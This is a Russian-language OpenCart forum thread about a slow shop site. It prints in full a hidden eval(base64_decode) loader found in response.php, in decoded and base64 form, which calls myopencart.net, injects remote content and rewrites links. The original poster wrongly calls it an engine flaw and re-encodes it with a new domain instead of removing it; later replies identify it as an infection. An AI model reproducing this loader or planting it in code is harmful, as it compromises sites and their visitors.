Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Тормозил сайт из-за ссылки на myopencart.net


Recommended Posts

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

 

1. после установки скрипта времени генерации страницы (вставлять в index.php - в начало 1 часть и в конец вторую часть кода):

 

 

 

 

// 1 часть кода

<?php  

// фиксация времени начала генерации страницы  
$begin = microtime();  
// матрица начального времени с секундами и миллисекундами  
$arrbegin = explode(" ",$begin);  
// Полное начальное время
$allbegin = $arrbegin[1] + $arrbegin[0];  

?>  
//......код файла index.php здесь.......

 

 

//  2 часть кода, ставится в конце:

<?php  

// фиксация времени останова   
$stop = microtime();  
// матрица времени останова с секундами и миллисекундами  
$arrend = explode(" ",$stop);  
// Полное время останова
$allend = $arrend[1] + $arrend[0];  
// вычитание из конечного времени начального  
$alltime = $allend - $allbegin;  

// вывод в браузер времени генерации страницы  
$format = "Страница сгенерирована за %f секунд";
printf($format,$alltime);  

?>
 

 

 

 

понял что страница на сайте грузится 5-6 секунд.

 

2. После 2 дней полемики с техподдержкой, мне дали нормальный ответ:

В коде сайта, точнее в файле system/library/response.php

есть следующая строка:

$ouput = eval(base64_decode(тут закодированный скрипт='));
Она находится в самом в конце, можете сами убедится.
Если его расшифровать, то получим следующий код:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "http://opencart.com", "http://=^_^=.ru",
"http://myopencart.ru", "https://opencartforum.com", "http://opencart.ru", "http://opencart.by");
$replace = array("", $ftend, "http://myopencart.net", "http://myopencart.net",
"http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
Из которого видно что скрипт обращается к myopencart.net, для

которого не прописан IP:

$ dig a myopencart.net
; <<>> DiG 9.9.2-P1 <<>> a myopencart.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62470
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL:
0
;; QUESTION SECTION:
;myopencart.net.                        IN      A
3. В итоге на сайте _ttp://www.codenet.ru/services/base64_encode-base64_decode/ расшифровал зашифрованный код, опять же через этот сайт его зашифровал, только вместо myopencart.net, написал myopencart.ru

 

в итоге зашифрованный код установил в файл system/library/response.php вместо старого:

 

1. Такой был

ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0=
 

 

2 Такой стал

ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0LnJ1L2dvb2dsZWNvZGUvYXBpL2FwaS5waHA/c2VydmVyPSIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiZwYWdlPSIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKXsKJGZpbmQgPSBhcnJheSgiPC9ib2R5PiIsICI8L2h0bWw+IiwgIm9wZW5jYXJ0LmNvbSIsICJtYXh6b24ucnUiLCAibXlvcGVuY2FydC5ydSIsICJvcGVuY2FydGZvcnVtLnJ1IiwgIm9wZW5jYXJ0LnJ1IiwgIm9wZW5jYXJ0LmJ5Iik7CiRyZXBsYWNlID0gYXJyYXkoIiIsICRmdGVuZCwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1IiwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1Iik7CiRvdXB1dCA9IHN0cl9yZXBsYWNlKCRmaW5kLCAkcmVwbGFjZSwgJG91cHV0KTsKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCJvZmYiKTsKZXJyb3JfcmVwb3J0aW5nKDApOwplY2hvICRvdXB1dDt9CmVsc2UgewplY2hvICRvdXB1dDsKfQ==
 

 

 

 

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

Edited by rb2
unlink
  • +1 3
Link to comment
Share on other sites


Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Неправильно даже сделал оказывается, более правильно написано в разделе форума:

 

https://opencartforum.com/topic/22202-proverka-na-nalichie-vredonosnogo-koda-na-vashikh/

  • +1 1
Link to comment
Share on other sites


Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Link to comment
Share on other sites


Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

...........

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

 

Спасибо за пояснение!

А какая у вас версия опенкарта?

Почему недоработка? Это же поясняется в этой ветке настоящего форума, это заражение файла было! Удалите этот код, либо просто файл замените!

 

Я для проверки скачал два разных дистрибутива ocStore 1.5.4.1 с какого-то стороннего ресурса и с гугла хранилища, ни в одном нет такого кода, ну понятное дело что это было не на всех архивах. Да и дистрибутивы от октября 2012 года, хотя написано что заражены были в апреле 2013 где-то они...

 

Будем знать что такое бывает. Только стал просматривать инфу по установке магазина и "на тебе" такие заявочки нехорошие...

Link to comment
Share on other sites


Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.